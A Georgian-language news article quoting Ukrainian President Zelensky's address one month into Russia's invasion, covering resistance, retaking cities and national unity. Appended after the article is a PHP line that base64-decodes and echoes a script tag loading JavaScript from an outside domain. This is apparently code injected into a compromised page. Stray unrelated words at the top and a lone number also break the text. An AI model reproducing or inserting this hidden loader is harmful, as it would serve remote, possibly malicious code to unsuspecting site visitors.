celsiusi
ავერსი შნაიდერი
ჩვენ 6-ჯერ უფრო დიდხანს გავძელით, ვიდრე მტერი ფიქრობდა. იმაზე მეტი, ვიდრე რუსი სამხედრო მაღალჩინოსნები პრეზიდენტს ეუბნებოდნენ – განაცხადა უკრაინის პრეზიდენტმა ვოლოდიმერ ზელინსკიმ ტრადიციულ შემაჯამებელ ვიდეომიმართვაში. 
 
მისივე თქმით, ყველა ადგილს, რომელიც ამ დრომდე გმირულად დგას, უკრაინა დაიბრუნებს. ოკუპანტებს კი ჩადენილი ყველა სამხედრო დანაშაულისთვის პასუხს გება მოუწევთ. 
 
"ჩემო უკრაინელებო, უკვე ერთი თვე გავიდა. ჩვენ 6-ჯერ უფრო დიდხანს გავძელით, ვიდრე მტერი ფიქრობდა. იმაზე მეტი, ვიდრე რუსი სამხედრო მაღალჩინოსნები პრეზიდენტს ეუბნებოდნენ. ისინი დარწმუნებულები იყვნენ, რომ უკრაინა სახელმწიფო არ იყო, ჩვენ ერი არ ვიყავით. თავს იტყუებდნენ. თუმცა, ეს ჩვენი საქმე არაა, ეს მათი სახელმწიფოებრივი თვითმკვლელობაა. ჩვენ ჩვენს ქვეყანას და თავისუფლებას, ასევე ბავშვებს და მომავალს ვიცავთ. 
 
ყველა ადგილს, რომელიც ამ დრომდე გმირულად დგას, დავიბრუნებთ. ოკუპანტებს ჩადენილი ყველა სამხედრო დანაშაულისთვის პასუხს ვაგებინებთ. 
 
ჟიტომირი, სუმი, კიევი, ჩერნიგოვი, ხარკოვი და მარიუპოლი, ვოლნოვახა და ნიკოლაევი, ოხტირკა და ჰოსტომელი, ხერსონი და ოდესა, იზიუმი და დონეცკი, ლუგანსკი და ჩერნობაევკაც, გამარჯვების შემდეგ, ჩვენი ყველა მოქალაქე თავისუფალ უკრაინაში იცხოვრებს და ეს ძალიან მალე მოხდება. 
 
ჩვენ ყველანი უკრაინელები ვართ, ევროპელები და თავისუფალი ადამიანები ვართ. ერთიანობა ყველა ფრონტზე - ბრძოლის ველზე, მიტინგებზე, სამიტებზე, სამსახურში, ადამიანებთან საუბრისას, ჩვენი ქმედებით რუსეთი უნდა ვაიძულოთ, რომ მშვიდობა ეძებოს. ჩვენი ქმედებებით გამარჯვება და თავისუფლება ერთმანეთს უნდა დავუკავშიროთ. 
 
მარადიული ხსოვნა მათ, ვინც სამშობლოსთვის დაიღუპა. დიდება ყველა ჩვენს გმირს! დიდება უკრაინას!, - განაცხადა ზელენსკიმ. 
861
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");